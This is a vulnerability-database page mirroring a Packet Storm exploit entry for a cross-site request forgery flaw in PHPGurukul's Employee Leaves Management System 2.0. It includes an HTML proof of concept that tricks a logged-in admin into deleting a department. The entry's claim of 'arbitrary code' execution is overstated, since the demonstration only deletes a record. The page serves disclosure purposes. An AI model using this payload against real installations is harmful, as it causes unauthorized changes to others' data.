Lucene search
K

Employee Leaves Management System 2.0 Cross Site Request Forgery

🗓️ 22 Jan 2020 00:00:00Reported by Priyanka SamakType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 138 Views

Employee Leaves Management System 2.0 Cross-Site Request Forgery vulnerability, allows attacker to execute arbitrary cod

Code
`# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request  
Forgery  
# Date: 22-01-2020  
# Author: Priyanka Samak  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link:  
https://phpgurukul.com/employee-leaves-management-system-elms/  
# Software: Employee Leaves Management System  
# Version : 2.0  
# Tested on Windows 10  
# Vulnerability Type: Cross-Site Request Forgery  
#Cross-site Request Forgery is an attack whereby an attacker tricks a  
victim into performing actions on their behalf.  
#*1. Description*  
#The vulnerability exists due to failure in the "/managedepartments.php"  
script to properly verify the source of HTTP request.  
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute  
arbitrary code by sending a malicious request to a logged-in user.  
#*2. Proof of Concept:* This example sends HTTP GET crafted request in  
order to delete the specified department.  
<html>  
<body  
<button class="button"><a href="  
http://localhost/elms/admin/managedepartments.php?del=6">Click Me!</button>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation